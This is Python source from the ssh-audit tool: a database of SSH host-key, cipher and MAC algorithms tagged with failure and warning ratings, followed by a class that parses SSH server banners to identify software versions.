            'ecdsa-sha2-nistk409': [[], [FAIL_UNPROVEN], [WARN_RNDSIG_KEY]],
            'ecdsa-sha2-nistp224': [[], [FAIL_NSA_BACKDOORED_CURVE, FAIL_SMALL_ECC_MODULUS], [WARN_RNDSIG_KEY]],
            'ecdsa-sha2-nistp192': [[], [FAIL_NSA_BACKDOORED_CURVE, FAIL_SMALL_ECC_MODULUS], [WARN_RNDSIG_KEY]],
            'ecdsa-sha2-nistp256': [['5.7,d2013.62,l10.6.4'], [FAIL_NSA_BACKDOORED_CURVE], [WARN_RNDSIG_KEY]],
            'ecdsa-sha2-nistp256-cert-v01@openssh.com': [['5.7'], [FAIL_NSA_BACKDOORED_CURVE], [WARN_RNDSIG_KEY]],
            'ecdsa-sha2-nistp384': [['5.7,d2013.62,l10.6.4'], [FAIL_NSA_BACKDOORED_CURVE], [WARN_RNDSIG_KEY]],
            'ecdsa-sha2-nistp384-cert-v01@openssh.com': [['5.7'], [FAIL_NSA_BACKDOORED_CURVE], [WARN_RNDSIG_KEY]],
            'ecdsa-sha2-nistp521': [['5.7,d2013.62,l10.6.4'], [FAIL_NSA_BACKDOORED_CURVE], [WARN_RNDSIG_KEY]],
            'ecdsa-sha2-nistp521-cert-v01@openssh.com': [['5.7'], [FAIL_NSA_BACKDOORED_CURVE], [WARN_RNDSIG_KEY]],
            'ecdsa-sha2-nistt571': [[], [FAIL_UNPROVEN], [WARN_RNDSIG_KEY]],
            'eddsa-e382-shake256@libassh.org': [[], [FAIL_UNPROVEN]],
            'eddsa-e521-shake256@libassh.org': [[], [FAIL_UNPROVEN]],
            'null': [[], [FAIL_PLAINTEXT]],
            'pgp-sign-dss': [[], [FAIL_1024BIT_MODULUS]],
            'pgp-sign-rsa': [[], [FAIL_1024BIT_MODULUS]],
            'rsa-sha2-256': [['7.2,d2020.79']],
            'rsa-sha2-256-cert-v01@openssh.com': [['7.8']],
            'rsa-sha2-512': [['7.2']],
            'rsa-sha2-512-cert-v01@openssh.com': [['7.8']],
            'sk-ecdsa-sha2-nistp256-cert-v01@openssh.com': [['8.2'], [FAIL_NSA_BACKDOORED_CURVE], [WARN_RNDSIG_KEY]],
            'sk-ecdsa-sha2-nistp256@openssh.com': [['8.2'], [FAIL_NSA_BACKDOORED_CURVE], [WARN_RNDSIG_KEY]],
            'sk-ssh-ed25519-cert-v01@openssh.com': [['8.2']],
            'sk-ssh-ed25519@openssh.com': [['8.2']],
            'spi-sign-rsa': [[]],
            'spki-sign-dss': [[], [FAIL_1024BIT_MODULUS]],
            'spki-sign-rsa': [[], [FAIL_1024BIT_MODULUS]],
            'ssh-dsa': [[], [FAIL_1024BIT_MODULUS], [WARN_RNDSIG_KEY]],
            'ssh-dss': [['2.1.0,d0.28,l10.2', '6.9'], [FAIL_1024BIT_MODULUS], [WARN_RNDSIG_KEY], [INFO_DISABLED_IN_OPENSSH70]],
            'ssh-dss-cert-v00@openssh.com': [['5.4', '6.9'], [FAIL_1024BIT_MODULUS], [WARN_RNDSIG_KEY], [INFO_DISABLED_IN_OPENSSH70]],
            'ssh-dss-cert-v01@openssh.com': [['5.6', '6.9'], [FAIL_1024BIT_MODULUS], [WARN_RNDSIG_KEY]],
            'ssh-dss-sha224@ssh.com': [[], [FAIL_1024BIT_MODULUS]],
            'ssh-dss-sha256@ssh.com': [[], [FAIL_1024BIT_MODULUS]],
            'ssh-dss-sha384@ssh.com': [[], [FAIL_1024BIT_MODULUS]],
            'ssh-dss-sha512@ssh.com': [[], [FAIL_1024BIT_MODULUS]],
            'ssh-ed25519': [['6.5,d2020.79,l10.7.0']],
            'ssh-ed25519-cert-v01@openssh.com': [['6.5']],
            'ssh-ed448': [[]],
            'ssh-ed448-cert-v01@openssh.com': [[], [], [], [INFO_NEVER_IMPLEMENTED_IN_OPENSSH]],
            'ssh-gost2001': [[], [FAIL_UNTRUSTED]],
            'ssh-gost2012-256': [[], [FAIL_UNTRUSTED]],
            'ssh-gost2012-512': [[], [FAIL_UNTRUSTED]],
            'ssh-rsa1': [[], [FAIL_SHA1]],
            'ssh-rsa': [['2.5.0,d0.28,l10.2'], [FAIL_SHA1], [], [INFO_DEPRECATED_IN_OPENSSH88]],
            'ssh-rsa-cert-v00@openssh.com': [['5.4', '6.9'], [FAIL_SHA1], [], [INFO_REMOVED_IN_OPENSSH70]],
            'ssh-rsa-cert-v01@openssh.com': [['5.6'], [FAIL_SHA1], [], [INFO_DEPRECATED_IN_OPENSSH88]],
            'ssh-rsa-sha224@ssh.com': [[]],
            'ssh-rsa-sha2-256': [[]],
            'ssh-rsa-sha2-512': [[]],
            'ssh-rsa-sha256@ssh.com': [[]],
            'ssh-rsa-sha384@ssh.com': [[]],
            'ssh-rsa-sha512@ssh.com': [[]],
            'ssh-xmss-cert-v01@openssh.com': [['7.7'], [WARN_EXPERIMENTAL]],
            'ssh-xmss@openssh.com': [['7.7'], [WARN_EXPERIMENTAL]],
            'webauthn-sk-ecdsa-sha2-nistp256@openssh.com': [['8.3'], [FAIL_NSA_BACKDOORED_CURVE]],
            'x509v3-ecdsa-sha2-1.3.132.0.10': [[], [FAIL_UNKNOWN]],
            'x509v3-ecdsa-sha2-nistp256': [[], [FAIL_NSA_BACKDOORED_CURVE]],
            'x509v3-ecdsa-sha2-nistp384': [[], [FAIL_NSA_BACKDOORED_CURVE]],
            'x509v3-ecdsa-sha2-nistp521': [[], [FAIL_NSA_BACKDOORED_CURVE]],
            'x509v3-rsa2048-sha256': [[]],
            'x509v3-sign-dss': [[], [FAIL_1024BIT_MODULUS], [WARN_RNDSIG_KEY]],
            'x509v3-sign-dss-sha1': [[], [FAIL_1024BIT_MODULUS, FAIL_SHA1]],
            'x509v3-sign-dss-sha224@ssh.com': [[], [FAIL_1024BIT_MODULUS]],
            'x509v3-sign-dss-sha256@ssh.com': [[], [FAIL_1024BIT_MODULUS]],
            'x509v3-sign-dss-sha384@ssh.com': [[], [FAIL_1024BIT_MODULUS]],
            'x509v3-sign-dss-sha512@ssh.com': [[], [FAIL_1024BIT_MODULUS]],
            'x509v3-sign-rsa': [[], [FAIL_SHA1]],
            'x509v3-sign-rsa-sha1': [[], [FAIL_SHA1]],
            'x509v3-sign-rsa-sha224@ssh.com': [[]],
            'x509v3-sign-rsa-sha256': [[]],
            'x509v3-sign-rsa-sha256@ssh.com': [[]],
            'x509v3-sign-rsa-sha384@ssh.com': [[]],
            'x509v3-sign-rsa-sha512@ssh.com': [[]],
            'x509v3-ssh-dss': [[], [FAIL_1024BIT_MODULUS], [WARN_RNDSIG_KEY]],
            'x509v3-ssh-rsa': [[], [FAIL_SHA1], [], [INFO_DEPRECATED_IN_OPENSSH88]],
        },
        'enc': {
            '3des-cbc': [['1.2.2,d0.28,l10.2', '6.6', None], [FAIL_3DES], [WARN_CIPHER_MODE, WARN_BLOCK_SIZE]],
            '3des-cfb': [[], [FAIL_3DES], [WARN_CIPHER_MODE]],
            '3des-ctr': [['d0.52'], [FAIL_3DES]],
            '3des-ecb': [[], [FAIL_3DES], [WARN_CIPHER_MODE]],
            '3des': [[], [FAIL_3DES], [WARN_CIPHER_MODE, WARN_BLOCK_SIZE]],
            '3des-ofb': [[], [FAIL_3DES], [WARN_CIPHER_MODE]],
            'AEAD_AES_128_GCM': [[]],
            'AEAD_AES_256_GCM': [[]],
            'aes128-cbc': [['2.3.0,d0.28,l10.2', '6.6', None], [], [WARN_CIPHER_MODE]],
            'aes128-ctr': [['3.7,d0.52,l10.4.1']],
            'aes128-gcm': [[]],
            'aes128-gcm@openssh.com': [['6.2']],
            'aes128-ocb@libassh.org': [[], [], [WARN_CIPHER_MODE]],
            'aes192-cbc': [['2.3.0,l10.2', '6.6', None], [], [WARN_CIPHER_MODE]],
            'aes192-ctr': [['3.7,l10.4.1']],
            'aes192-gcm@openssh.com': [[], [], [], [INFO_NEVER_IMPLEMENTED_IN_OPENSSH]],
            'aes256-cbc': [['2.3.0,d0.47,l10.2', '6.6', None], [], [WARN_CIPHER_MODE]],
            'aes256-ctr': [['3.7,d0.52,l10.4.1']],
            'aes256-gcm': [[]],
            'aes256-gcm@openssh.com': [['6.2']],
            'arcfour128': [['4.2', '6.6', '7.1'], [FAIL_RC4]],
            'arcfour': [['2.1.0', '6.6', '7.1'], [FAIL_RC4]],
            'arcfour256': [['4.2', '6.6', '7.1'], [FAIL_RC4]],
            'blowfish-cbc': [['1.2.2,d0.28,l10.2', '6.6,d0.52', '7.1,d0.52'], [FAIL_BLOWFISH], [WARN_CIPHER_MODE, WARN_BLOCK_SIZE]],
            'blowfish-cfb': [[], [FAIL_BLOWFISH], [WARN_CIPHER_MODE]],
            'blowfish-ctr': [[], [FAIL_BLOWFISH], [WARN_CIPHER_MODE, WARN_BLOCK_SIZE]],
            'blowfish-ecb': [[], [FAIL_BLOWFISH], [WARN_CIPHER_MODE]],
            'blowfish': [[], [FAIL_BLOWFISH], [WARN_BLOCK_SIZE]],
            'blowfish-ofb': [[], [FAIL_BLOWFISH], [WARN_CIPHER_MODE]],
            'camellia128-cbc@openssh.org': [[], [], [WARN_CIPHER_MODE]],
            'camellia128-cbc': [[], [], [WARN_CIPHER_MODE]],
            'camellia128-ctr': [[]],
            'camellia128-ctr@openssh.org': [[]],
            'camellia192-cbc@openssh.org': [[], [], [WARN_CIPHER_MODE]],
            'camellia192-cbc': [[], [], [WARN_CIPHER_MODE]],
            'camellia192-ctr': [[]],
            'camellia192-ctr@openssh.org': [[]],
            'camellia256-cbc@openssh.org': [[], [], [WARN_CIPHER_MODE]],
            'camellia256-cbc': [[], [], [WARN_CIPHER_MODE]],
            'camellia256-ctr': [[]],
            'camellia256-ctr@openssh.org': [[]],
            'cast128-12-cbc@ssh.com': [[], [FAIL_CAST], [WARN_CIPHER_MODE]],
            'cast128-cbc': [['2.1.0', '6.6', '7.1'], [FAIL_CAST], [WARN_CIPHER_MODE, WARN_BLOCK_SIZE]],
            'cast128-12-cbc': [[], [FAIL_CAST], [WARN_CIPHER_MODE]],
            'cast128-12-cfb': [[], [FAIL_CAST], [WARN_CIPHER_MODE]],
            'cast128-12-ecb': [[], [FAIL_CAST], [WARN_CIPHER_MODE]],
            'cast128-12-ofb': [[], [FAIL_CAST], [WARN_CIPHER_MODE]],
            'cast128-cfb': [[], [FAIL_CAST], [WARN_CIPHER_MODE]],
            'cast128-ctr': [[], [FAIL_CAST]],
            'cast128-ecb': [[], [FAIL_CAST], [WARN_CIPHER_MODE]],
            'cast128-ofb': [[], [FAIL_CAST], [WARN_CIPHER_MODE]],
            'chacha20-poly1305': [[], [], [], [INFO_DEFAULT_OPENSSH_CIPHER]],
            'chacha20-poly1305@openssh.com': [['6.5,d2020.79'], [], [], [INFO_DEFAULT_OPENSSH_CIPHER]],
            'crypticore128@ssh.com': [[], [FAIL_UNPROVEN]],
            'des-cbc': [[], [FAIL_DES], [WARN_CIPHER_MODE, WARN_BLOCK_SIZE]],
            'des-cfb': [[], [FAIL_DES], [WARN_CIPHER_MODE, WARN_BLOCK_SIZE]],
            'des-ecb': [[], [FAIL_DES], [WARN_CIPHER_MODE, WARN_BLOCK_SIZE]],
            'des-ofb': [[], [FAIL_DES], [WARN_CIPHER_MODE, WARN_BLOCK_SIZE]],
            'des-cbc-ssh1': [[], [FAIL_DES], [WARN_CIPHER_MODE, WARN_BLOCK_SIZE]],
            'des-cbc@ssh.com': [[], [FAIL_DES], [WARN_CIPHER_MODE, WARN_BLOCK_SIZE]],
            'des': [[], [FAIL_DES], [WARN_CIPHER_MODE, WARN_BLOCK_SIZE]],
            'grasshopper-ctr128': [[], [FAIL_UNTRUSTED]],
            'idea-cbc': [[], [FAIL_IDEA], [WARN_CIPHER_MODE]],
            'idea-cfb': [[], [FAIL_IDEA], [WARN_CIPHER_MODE]],
            'idea-ctr': [[], [FAIL_IDEA]],
            'idea-ecb': [[], [FAIL_IDEA], [WARN_CIPHER_MODE]],
            'idea-ofb': [[], [FAIL_IDEA], [WARN_CIPHER_MODE]],
            'none': [['1.2.2,d2013.56,l10.2'], [FAIL_PLAINTEXT]],
            'rijndael128-cbc': [['2.3.0', '7.0'], [FAIL_RIJNDAEL], [WARN_CIPHER_MODE], [INFO_DISABLED_IN_OPENSSH70]],
            'rijndael192-cbc': [['2.3.0', '7.0'], [FAIL_RIJNDAEL], [WARN_CIPHER_MODE], [INFO_DISABLED_IN_OPENSSH70]],
            'rijndael256-cbc': [['2.3.0', '7.0'], [FAIL_RIJNDAEL], [WARN_CIPHER_MODE], [INFO_DISABLED_IN_OPENSSH70]],
            'rijndael-cbc@lysator.liu.se': [['2.3.0', '6.6', '7.0'], [FAIL_RIJNDAEL], [WARN_CIPHER_MODE], [INFO_DISABLED_IN_OPENSSH70]],
            'rijndael-cbc@ssh.com': [[], [FAIL_RIJNDAEL], [WARN_CIPHER_MODE]],
            'seed-cbc@ssh.com': [[], [FAIL_SEED], [WARN_CIPHER_MODE]],
            'seed-ctr@ssh.com': [[], [FAIL_SEED]],
            'serpent128-cbc': [[], [FAIL_SERPENT], [WARN_CIPHER_MODE]],
            'serpent128-ctr': [[], [FAIL_SERPENT]],
            'serpent128-gcm@libassh.org': [[], [FAIL_SERPENT]],
            'serpent192-cbc': [[], [FAIL_SERPENT], [WARN_CIPHER_MODE]],
            'serpent192-ctr': [[], [FAIL_SERPENT]],
            'serpent256-cbc': [[], [FAIL_SERPENT], [WARN_CIPHER_MODE]],
            'serpent256-ctr': [[], [FAIL_SERPENT]],
            'serpent256-gcm@libassh.org': [[], [FAIL_SERPENT]],
            'twofish128-cbc': [['d0.47', 'd2014.66'], [], [WARN_CIPHER_MODE], [INFO_DISABLED_IN_DBEAR67]],
            'twofish128-ctr': [['d2015.68']],
            'twofish128-gcm@libassh.org': [[]],
            'twofish192-cbc': [[], [], [WARN_CIPHER_MODE]],
            'twofish192-ctr': [[]],
            'twofish256-cbc': [['d0.47', 'd2014.66'], [], [WARN_CIPHER_MODE], [INFO_DISABLED_IN_DBEAR67]],
            'twofish256-ctr': [['d2015.68']],
            'twofish256-gcm@libassh.org': [[]],
            'twofish-cbc': [['d0.28', 'd2014.66'], [], [WARN_CIPHER_MODE], [INFO_DISABLED_IN_DBEAR67]],
            'twofish-cfb': [[], [], [WARN_CIPHER_MODE]],
            'twofish-ctr': [[]],
            'twofish-ecb': [[], [], [WARN_CIPHER_MODE]],
            'twofish-ofb': [[], [], [WARN_CIPHER_MODE]],
        },
        'mac': {
            'AEAD_AES_128_GCM': [[]],
            'AEAD_AES_256_GCM': [[]],
            'aes128-gcm': [[]],
            'aes256-gcm': [[]],
            'cbcmac-3des': [[], [FAIL_UNPROVEN, FAIL_3DES]],
            'cbcmac-aes': [[], [FAIL_UNPROVEN]],
            'cbcmac-blowfish': [[], [FAIL_UNPROVEN, FAIL_BLOWFISH]],
            'cbcmac-des': [[], [FAIL_UNPROVEN, FAIL_DES]],
            'cbcmac-rijndael': [[], [FAIL_UNPROVEN, FAIL_RIJNDAEL]],
            'cbcmac-twofish': [[], [FAIL_UNPROVEN]],
            'chacha20-poly1305@openssh.com': [[], [], [], [INFO_NEVER_IMPLEMENTED_IN_OPENSSH]],  # Despite the @openssh.com tag, this was never shipped as a MAC in OpenSSH (only as a cipher); it is only implemented as a MAC in Syncplify.
            'crypticore-mac@ssh.com': [[], [FAIL_UNPROVEN]],
            'hmac-md5': [['2.1.0,d0.28', '6.6', '7.1'], [FAIL_MD5], [WARN_ENCRYPT_AND_MAC]],
            'hmac-md5-96': [['2.5.0', '6.6', '7.1'], [FAIL_MD5], [WARN_ENCRYPT_AND_MAC]],
            'hmac-md5-96-etm@openssh.com': [['6.2', '6.6', '7.1'], [FAIL_MD5]],
            'hmac-md5-etm@openssh.com': [['6.2', '6.6', '7.1'], [FAIL_MD5]],
            'hmac-ripemd160': [['2.5.0', '6.6', '7.1'], [FAIL_RIPEMD], [WARN_ENCRYPT_AND_MAC]],
            'hmac-ripemd160-96': [[], [FAIL_RIPEMD], [WARN_ENCRYPT_AND_MAC, WARN_TAG_SIZE]],
            'hmac-ripemd160-etm@openssh.com': [['6.2', '6.6', '7.1'], [FAIL_RIPEMD]],
            'hmac-ripemd160@openssh.com': [['2.1.0', '6.6', '7.1'], [FAIL_RIPEMD], [WARN_ENCRYPT_AND_MAC]],
            'hmac-ripemd': [[], [FAIL_RIPEMD], [WARN_ENCRYPT_AND_MAC]],
            'hmac-sha1': [['2.1.0,d0.28,l10.2'], [FAIL_SHA1], [WARN_ENCRYPT_AND_MAC]],
            'hmac-sha1-96': [['2.5.0,d0.47', '6.6', '7.1'], [FAIL_SHA1], [WARN_ENCRYPT_AND_MAC]],
            'hmac-sha1-96-etm@openssh.com': [['6.2', '6.6', None], [FAIL_SHA1]],
            'hmac-sha1-96@openssh.com': [[], [FAIL_SHA1], [WARN_TAG_SIZE, WARN_ENCRYPT_AND_MAC], [INFO_NEVER_IMPLEMENTED_IN_OPENSSH]],
            'hmac-sha1-etm@openssh.com': [['6.2'], [FAIL_SHA1]],
            'hmac-sha2-224': [[], [], [WARN_TAG_SIZE, WARN_ENCRYPT_AND_MAC]],
            'hmac-sha224@ssh.com': [[], [], [WARN_ENCRYPT_AND_MAC]],
            'hmac-sha2-256': [['5.9,d2013.56,l10.7.0'], [], [WARN_ENCRYPT_AND_MAC]],
            'hmac-sha2-256-96': [['5.9', '6.0'], [], [WARN_ENCRYPT_AND_MAC], [INFO_REMOVED_IN_OPENSSH61]],
            'hmac-sha2-256-96-etm@openssh.com': [[], [], [WARN_TAG_SIZE_96], [INFO_NEVER_IMPLEMENTED_IN_OPENSSH]],  # Only ever implemented in AsyncSSH (?).
            'hmac-sha2-256-etm@openssh.com': [['6.2']],
            'hmac-sha2-384': [[], [], [WARN_ENCRYPT_AND_MAC]],
            'hmac-sha2-512': [['5.9,d2013.56,l10.7.0'], [], [WARN_ENCRYPT_AND_MAC]],
            'hmac-sha2-512-96': [['5.9', '6.0'], [], [WARN_ENCRYPT_AND_MAC], [INFO_REMOVED_IN_OPENSSH61]],
            'hmac-sha2-512-96-etm@openssh.com': [[], [], [WARN_TAG_SIZE_96], [INFO_NEVER_IMPLEMENTED_IN_OPENSSH]],  # Only ever implemented in AsyncSSH (?).
            'hmac-sha2-512-etm@openssh.com': [['6.2']],
            'hmac-sha256-2@ssh.com': [[], [], [WARN_ENCRYPT_AND_MAC]],
            'hmac-sha256-96@ssh.com': [[], [], [WARN_ENCRYPT_AND_MAC, WARN_TAG_SIZE]],
            'hmac-sha256-96': [[], [], [WARN_ENCRYPT_AND_MAC, WARN_TAG_SIZE]],
            'hmac-sha256@ssh.com': [[], [], [WARN_ENCRYPT_AND_MAC]],
            'hmac-sha256': [[], [], [WARN_ENCRYPT_AND_MAC]],
            'hmac-sha2-56': [[], [], [WARN_TAG_SIZE, WARN_ENCRYPT_AND_MAC]],
            'hmac-sha3-224': [[], [], [WARN_ENCRYPT_AND_MAC]],
            'hmac-sha3-256': [[], [], [WARN_ENCRYPT_AND_MAC]],
            'hmac-sha3-384': [[], [], [WARN_ENCRYPT_AND_MAC]],
            'hmac-sha3-512': [[], [], [WARN_ENCRYPT_AND_MAC]],
            'hmac-sha384@ssh.com': [[], [], [WARN_ENCRYPT_AND_MAC]],
            'hmac-sha512@ssh.com': [[], [], [WARN_ENCRYPT_AND_MAC]],
            'hmac-sha512': [[], [], [WARN_ENCRYPT_AND_MAC]],
            'hmac-whirlpool': [[], [], [WARN_ENCRYPT_AND_MAC]],
            'md5':  [[], [FAIL_PLAINTEXT]],
            'md5-8':  [[], [FAIL_PLAINTEXT]],
            'none': [['d2013.56'], [FAIL_PLAINTEXT]],
            'ripemd160':  [[], [FAIL_PLAINTEXT]],
            'ripemd160-8':  [[], [FAIL_PLAINTEXT]],
            'sha1':  [[], [FAIL_PLAINTEXT]],
            'sha1-8':  [[], [FAIL_PLAINTEXT]],
            'umac-128': [[], [], [WARN_ENCRYPT_AND_MAC]],
            'umac-128-etm@openssh.com': [['6.2']],
            'umac-128@openssh.com': [['6.2'], [], [WARN_ENCRYPT_AND_MAC]],
            'umac-32@openssh.com': [[], [], [WARN_ENCRYPT_AND_MAC, WARN_TAG_SIZE], [INFO_NEVER_IMPLEMENTED_IN_OPENSSH]],
            'umac-64-etm@openssh.com': [['6.2'], [], [WARN_TAG_SIZE]],
            'umac-64@openssh.com': [['4.7'], [], [WARN_ENCRYPT_AND_MAC, WARN_TAG_SIZE]],
            'umac-96@openssh.com': [[], [], [WARN_ENCRYPT_AND_MAC], [INFO_NEVER_IMPLEMENTED_IN_OPENSSH]],
        }
    }


    @staticmethod
    def get_db() -> Dict[str, Dict[str, List[List[Optional[str]]]]]:
        '''Returns a copy of the MASTER_DB that is private to the calling thread.  This prevents multiple threads from polluting the results of other threads.'''
        calling_thread_id = threading.get_ident()

        if calling_thread_id not in SSH2_KexDB.DB_PER_THREAD:
            SSH2_KexDB.DB_PER_THREAD[calling_thread_id] = copy.deepcopy(SSH2_KexDB.MASTER_DB)

        return SSH2_KexDB.DB_PER_THREAD[calling_thread_id]


    @staticmethod
    def thread_exit() -> None:
        '''Deletes the calling thread's copy of the MASTER_DB.  This is needed because, in rare circumstances, a terminated thread's ID can be re-used by new threads.'''

        calling_thread_id = threading.get_ident()

        if calling_thread_id in SSH2_KexDB.DB_PER_THREAD:
            del SSH2_KexDB.DB_PER_THREAD[calling_thread_id]



"""
   The MIT License (MIT)

   Copyright (C) 2017 Andris Raugulis (moo@arthepsy.eu)

   Permission is hereby granted, free of charge, to any person obtaining a copy
   of this software and associated documentation files (the "Software"), to deal
   in the Software without restriction, including without limitation the rights
   to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
   copies of the Software, and to permit persons to whom the Software is
   furnished to do so, subject to the following conditions:

   The above copyright notice and this permission notice shall be included in
   all copies or substantial portions of the Software.

   THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
   IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
   FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
   AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
   LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
   OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
   THE SOFTWARE.
"""
import re

# pylint: disable=unused-import
from typing import Dict, List, Set, Sequence, Tuple, Iterable  # noqa: F401
from typing import Callable, Optional, Union, Any  # noqa: F401

from ssh_audit.banner import Banner
from ssh_audit.product import Product


class Software:
    def __init__(self, vendor: Optional[str], product: str, version: str, patch: Optional[str], os_version: Optional[str]) -> None:
        self.__vendor = vendor
        self.__product = product
        self.__version = version
        self.__patch = patch
        self.__os = os_version

    @property
    def vendor(self) -> Optional[str]:
        return self.__vendor

    @property
    def product(self) -> str:
        return self.__product

    @property
    def version(self) -> str:
        return self.__version

    @property
    def patch(self) -> Optional[str]:
        return self.__patch

    @property
    def os(self) -> Optional[str]:
        return self.__os

    def compare_version(self, other: Union[None, 'Software', str]) -> int:
        # pylint: disable=too-many-branches,too-many-return-statements
        if other is None:
            return 1
        if isinstance(other, Software):
            other = '{}{}'.format(other.version, other.patch or '')
        else:
            other = str(other)
        mx = re.match(r'^([\d\.]+\d+)(.*)$', other)
        if mx is not None:
            oversion, opatch = mx.group(1), mx.group(2).strip()
        else:
            oversion, opatch = other, ''
        if self.version < oversion:
            return -1
        elif self.version > oversion:
            return 1
        spatch = self.patch or ''
        if self.product == Product.DropbearSSH:
            if not re.match(r'^test\d.*$', opatch):
                opatch = 'z{}'.format(opatch)
            if not re.match(r'^test\d.*$', spatch):
                spatch = 'z{}'.format(spatch)
        elif self.product == Product.OpenSSH:
            mx1 = re.match(r'^p(\d).*', opatch)
            mx2 = re.match(r'^p(\d).*', spatch)
            if not (bool(mx1) and bool(mx2)):
                if mx1 is not None:
                    opatch = mx1.group(1)
                if mx2 is not None:
                    spatch = mx2.group(1)
            # OpenBSD version and p1 versions are considered the same.
            if ((spatch == '') and (opatch == '1')) or ((spatch == '1') and (opatch == '')):
                return 0
        if spatch < opatch:
            return -1
        elif spatch > opatch:
            return 1
        return 0

    def between_versions(self, vfrom: str, vtill: str) -> bool:
        if bool(vfrom) and self.compare_version(vfrom) < 0:
            return False
        if bool(vtill) and self.compare_version(vtill) > 0:
            return False
        return True

    def display(self, full: bool = True) -> str:
        r = '{} '.format(self.vendor) if bool(self.vendor) else ''
        r += self.product
        if bool(self.version):
            r += ' {}'.format(self.version)
        if full:
            patch = self.patch or ''
            if self.product == Product.OpenSSH:
                mx = re.match(r'^(p\d)(.*)$', patch)
                if mx is not None:
                    r += mx.group(1)
                    patch = mx.group(2).strip()
            if bool(patch):
                r += ' ({})'.format(patch)
            if bool(self.os):
                r += ' running on {}'.format(self.os)
        return r

    def __str__(self) -> str:
        return self.display()

    def __repr__(self) -> str:
        r = 'vendor={}, '.format(self.vendor) if bool(self.vendor) else ''
        r += 'product={}'.format(self.product)
        if bool(self.version):
            r += ', version={}'.format(self.version)
        if bool(self.patch):
            r += ', patch={}'.format(self.patch)
        if bool(self.os):
            r += ', os={}'.format(self.os)
        return '<{}({})>'.format(self.__class__.__name__, r)

    @staticmethod
    def _fix_patch(patch: str) -> Optional[str]:
        return re.sub(r'^[-_\.]+', '', patch) or None

    @staticmethod
    def _fix_date(d: Optional[str]) -> Optional[str]:
        if d is not None and len(d) == 8:
            return '{}-{}-{}'.format(d[:4], d[4:6], d[6:8])
        else:
            return None

    @classmethod
    def _extract_os_version(cls, c: Optional[str]) -> Optional[str]:
        if c is None:
            return None
        mx = re.match(r'^NetBSD(?:_Secure_Shell)?(?:[\s-]+(\d{8})(.*))?$', c)
        if mx is not None:
            d = cls._fix_date(mx.group(1))
            return 'NetBSD' if d is None else 'NetBSD ({})'.format(d)
        mx = re.match(r'^FreeBSD(?:\slocalisations)?[\s-]+(\d{8})(.*)$', c)
        if not bool(mx):
            mx = re.match(r'^[^@]+@FreeBSD\.org[\s-]+(\d{8})(.*)$', c)
        if mx is not None:
            d = cls._fix_date(mx.group(1))
            return 'FreeBSD' if d is None else 'FreeBSD ({})'.format(d)
        w = ['RemotelyAnywhere', 'DesktopAuthority', 'RemoteSupportManager']
        for win_soft in w:
            mx = re.match(r'^in ' + win_soft + r' ([\d\.]+\d)$', c)
            if mx is not None:
                ver = mx.group(1)
                return 'Microsoft Windows ({} {})'.format(win_soft, ver)
        generic = ['NetBSD', 'FreeBSD']
        for g in generic:
            if c.startswith(g) or c.endswith(g):
                return g
        return None

    @classmethod
    def parse(cls, banner: 'Banner') -> Optional['Software']:
        # pylint: disable=too-many-return-statements
        software = str(banner.software)
        mx = re.match(r'^dropbear_([\d\.]+\d+)(.*)', software)
        v: Optional[str] = None
        if mx is not None:
            patch = cls._fix_patch(mx.group(2))
            v, p = 'Matt Johnston', Product.DropbearSSH
            v = None
            return cls(v, p, mx.group(1), patch, None)
        mx = re.match(r'^OpenSSH[_\.-]+([\d\.]+\d+)(.*)', software)
        if mx is not None:
            patch = cls._fix_patch(mx.group(2))
            v, p = 'OpenBSD', Product.OpenSSH
            v = None
            os_version = cls._extract_os_version(banner.comments)
            return cls(v, p, mx.group(1), patch, os_version)
        mx = re.match(r'^libssh-([\d\.]+\d+)(.*)', software)
        if mx is not None:
            patch = cls._fix_patch(mx.group(2))
            v, p = None, Product.LibSSH
            os_version = cls._extract_os_version(banner.comments)
            return cls(v, p, mx.group(1), patch, os_version)
        mx = re.match(r'^libssh_([\d\.]+\d+)(.*)', software)
        if mx is not None:
            patch = cls._fix_patch(mx.group(2))
            v, p = None, Product.LibSSH
            os_version = cls._extract_os_version(banner.comments)
            return cls(v, p, mx.group(1), patch, os_version)
        mx = re.match(r'^RomSShell_([\d\.]+\d+)(.*)', software)
        if mx is not None:
            patch = cls._fix_patch(mx.group(2))
            v, p = 'Allegro Software', 'RomSShell'
            return cls(v, p, mx.group(1), patch, None)
        mx = re.match(r'^mpSSH_([\d\.]+\d+)', software)
        if mx is not None:
            v, p = 'HP', 'iLO (Integrated Lights-Out) sshd'
            return cls(v, p, mx.group(1), None, None)
        mx = re.match(r'^Cisco-([\d\.]+\d+)', software)
        if mx is not None:
            v, p = 'Cisco', 'IOS/PIX sshd'
            return cls(v, p, mx.group(1), None, None)
        mx = re.match(r'^tinyssh_(.*)', software)
        if mx is not None:
            return cls(None, Product.TinySSH, mx.group(1), None, None)
        mx = re.match(r'^PuTTY_Release_(.*)', software)
        if mx:
            return cls(None, Product.PuTTY, mx.group(1), None, None)
        mx = re.match(r'^lancom(.*)', software)
        if mx:
            v, p = 'LANcom', 'LCOS sshd'
            return cls(v, p, mx.group(1), None, None)
        return None
